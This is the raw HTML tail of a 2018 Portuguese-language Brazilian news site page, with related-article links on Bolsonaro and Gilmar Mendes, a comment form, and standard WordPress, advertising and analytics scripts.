data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="41645169_303" data-image-description="" data-medium-file="http://oiguassu.com/wp-content/uploads/2018/08/41645169_303-300x169.jpg" data-large-file="http://oiguassu.com/wp-content/uploads/2018/08/41645169_303.jpg" />		</a>
	</div>
			<p class="entry-meta">
			<span><a href="http://oiguassu.com/category/brasil/" rel="category tag">Brasil</a></span>
		</p>
		<h3 class="entry-title content-grid-title">
		<a href="http://oiguassu.com/bolsonaro-anuncia-general-como-vice/" title="BOLSONARO ANUNCIA GENERAL COMO VICE" rel="bookmark">
			BOLSONARO ANUNCIA GENERAL COMO VICE		</a>
	</h3>
</article>
<hr class="mh-separator content-grid-separator"><article class="mh-col mh-1-4 content-grid post-10308 post type-post status-publish format-standard has-post-thumbnail hentry category-brasil tag-manchete1">
	<div class="content-thumb content-grid-thumb">
		<a href="http://oiguassu.com/gilmar-mendes-solta-mais-um-investigado-na-lava-jato/" title="GILMAR MENDES SOLTA MAIS UM INVESTIGADO NA LAVA JATO"><img width="180" height="101" src="http://oiguassu.com/wp-content/uploads/2018/09/BBMVHLv-180x101.jpg" class="attachment-content-grid size-content-grid wp-post-image" alt="" srcset="http://oiguassu.com/wp-content/uploads/2018/09/BBMVHLv-180x101.jpg 180w, http://oiguassu.com/wp-content/uploads/2018/09/BBMVHLv-777x437.jpg 777w, http://oiguassu.com/wp-content/uploads/2018/09/BBMVHLv-260x146.jpg 260w, http://oiguassu.com/wp-content/uploads/2018/09/BBMVHLv-373x210.jpg 373w, http://oiguassu.com/wp-content/uploads/2018/09/BBMVHLv-120x67.jpg 120w" sizes="(max-width: 180px) 100vw, 180px" data-attachment-id="10309" data-permalink="http://oiguassu.com/gilmar-mendes-solta-mais-um-investigado-na-lava-jato/bbmvhlv/" data-orig-file="http://oiguassu.com/wp-content/uploads/2018/09/BBMVHLv.jpg" data-orig-size="1119,746" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="BBMVHLv" data-image-description="" data-medium-file="http://oiguassu.com/wp-content/uploads/2018/09/BBMVHLv-300x200.jpg" data-large-file="http://oiguassu.com/wp-content/uploads/2018/09/BBMVHLv-1024x683.jpg" />		</a>
	</div>
			<p class="entry-meta">
			<span><a href="http://oiguassu.com/category/brasil/" rel="category tag">Brasil</a></span>
		</p>
		<h3 class="entry-title content-grid-title">
		<a href="http://oiguassu.com/gilmar-mendes-solta-mais-um-investigado-na-lava-jato/" title="GILMAR MENDES SOLTA MAIS UM INVESTIGADO NA LAVA JATO" rel="bookmark">
			GILMAR MENDES SOLTA MAIS UM INVESTIGADO NA LAVA JATO		</a>
	</h3>
</article>
<hr class="mh-separator content-grid-separator">		</div><div class="comments-wrap">
<h4 class="comment-section-title"><span class="comment-count">Seja o Primeiro a comentar</span> <span class="comment-count-more">on "BOLETINS DE URNAS NO EXTERIOR JÁ CIRCULAM NAS REDES; TSE NÃO VÊ ILEGALIDADE"</span></h4>
</div>
	<div id="respond" class="comment-respond">
		<h3 id="reply-title" class="comment-reply-title">Deixe um comentário <small><a rel="nofollow" id="cancel-comment-reply-link" href="/boletins-de-urnas-no-exterior-ja-circulam-nas-redes-tse-nao-ve-ilegalidade/#respond" style="display:none;">Cancelar resposta</a></small></h3>			<form action="http://oiguassu.com/wp-comments-post.php" method="post" id="commentform" class="comment-form">
				<p class="comment-notes">Seu email não será publicado.</p><p class="comment-form-comment"><label for="comment">Comentário</label><br/><textarea id="comment" name="comment" cols="45" rows="5" aria-required="true"></textarea></p><p class="comment-form-author"><label for="author">Name </label><span class="required">*</span><br/><input id="author" name="author" type="text" value="" size="30" aria-required='true' /></p>
<p class="comment-form-email"><label for="email">Email </label><span class="required">*</span><br/><input id="email" name="email" type="text" value="" size="30" aria-required='true' /></p>
<p class="comment-form-url"><label for="url">Website</label><br/><input id="url" name="url" type="text" value="" size="30" /></p>
<p class="form-submit"><input name="submit" type="submit" id="submit" class="submit" value="Publicar comentário" /> <input type='hidden' name='comment_post_ID' value='11167' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
</p><p style="display: none;"><input type="hidden" id="akismet_comment_nonce" name="akismet_comment_nonce" value="d8b6e7a82d" /></p><p class="comment-subscription-form"><input type="checkbox" name="subscribe_comments" id="subscribe_comments" value="subscribe" style="width: auto; -moz-appearance: checkbox; -webkit-appearance: checkbox;" /> <label class="subscribe-label" id="subscribe-label" for="subscribe_comments">Notifique-me sobre novos comentários por e-mail.</label></p><p class="comment-subscription-form"><input type="checkbox" name="subscribe_blog" id="subscribe_blog" value="subscribe" style="width: auto; -moz-appearance: checkbox; -webkit-appearance: checkbox;" /> <label class="subscribe-label" id="subscribe-blog-label" for="subscribe_blog">Notifique-me sobre novas publicações por e-mail.</label></p><p style="display: none;"><input type="hidden" id="ak_js" name="ak_js" value="5"/></p>			</form>
			</div><!-- #respond -->
		</div>
	<aside class="mh-sidebar">
	<div id="search-2" class="sb-widget clearfix widget_search"><form role="search" method="get" class="search-form" action="http://oiguassu.com/">
				<label>
					<span class="screen-reader-text">Pesquisar por:</span>
					<input type="search" class="search-field" placeholder="Pesquisar &hellip;" value="" name="s" />
				</label>
				<input type="submit" class="search-submit" value="Pesquisar" />
			</form></div><div id="custom_html-7" class="widget_text sb-widget clearfix widget_custom_html"><div class="textwidget custom-html-widget"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- a -->
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-9260427313362027"
     data-ad-slot="4555141854"
     data-ad-format="auto"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></div></div></aside></div>
</div>
<footer class="mh-footer">
		<div class="wrapper-inner clearfix">
			</div>
	<div class="footer-bottom">
		<div class="wrapper-inner clearfix">
						<div class="copyright-wrap">
				<p class="copyright">
					Copyright 2018 | MH Newsdesk by <a href="http://www.mhthemes.com/" title="Premium Magazine WordPress Themes" rel="nofollow">MH Themes</a>				</p>
			</div>
		</div>
	</div>
</footer>

<!-- Infolinks START -->

<script type="text/javascript">
    var infolinks_pid = 3124372; 
    var infolinks_plugin_version = "WP_3.2.3"; 
    var infolinks_resources = "https://resources.infolinks.com/js"; 
</script>
<script type="text/javascript" src="https://resources.infolinks.com/js/infolinks_main.js" ></script>
<!-- Infolinks END -->	<div style="display:none">
	</div>

	<script type="text/javascript">
		window.WPCOM_sharing_counts = {"http:\/\/oiguassu.com\/boletins-de-urnas-no-exterior-ja-circulam-nas-redes-tse-nao-ve-ilegalidade\/":11167};
	</script>
<script type='text/javascript' src='https://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201841'></script>
<script type='text/javascript' src='https://secure.gravatar.com/js/gprofiles.js?ver=2018Octaa'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var WPGroHo = {"my_hash":""};
/* ]]> */
</script>
<script type='text/javascript' src='http://oiguassu.com/wp-content/plugins/jetpack/modules/wpgroho.js?ver=4.9.8'></script>
<script type='text/javascript' src='http://oiguassu.com/wp-includes/js/comment-reply.min.js?ver=4.9.8'></script>
<script type='text/javascript' src='http://oiguassu.com/wp-includes/js/wp-embed.min.js?ver=4.9.8'></script>
<script async="async" type='text/javascript' src='http://oiguassu.com/wp-content/plugins/akismet/_inc/form.js?ver=4.0.8'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var sharing_js_options = {"lang":"en","counts":"1"};
/* ]]> */
</script>
<script type='text/javascript' src='http://oiguassu.com/wp-content/plugins/jetpack/_inc/build/sharedaddy/sharing.min.js?ver=6.3.2'></script>
<script type='text/javascript'>
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-twitter', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomtwitter', 'menubar=1,resizable=1,width=600,height=350' );
				return false;
			});
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-facebook', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomfacebook', 'menubar=1,resizable=1,width=600,height=400' );
				return false;
			});
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-google-plus-1', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomgoogle-plus-1', 'menubar=1,resizable=1,width=480,height=550' );
				return false;
			});
</script>
<script type='text/javascript' src='https://stats.wp.com/e-201841.js' async='async' defer='defer'></script>
<script type='text/javascript'>
	_stq = window._stq || [];
	_stq.push([ 'view', {v:'ext',j:'1:6.3.2',blog:'12891280',post:'11167',tz:'-3',srv:'oiguassu.com'} ]);
	_stq.push([ 'clickTrackerInit', '12891280', '11167' ]);
</script>
</body>
</html>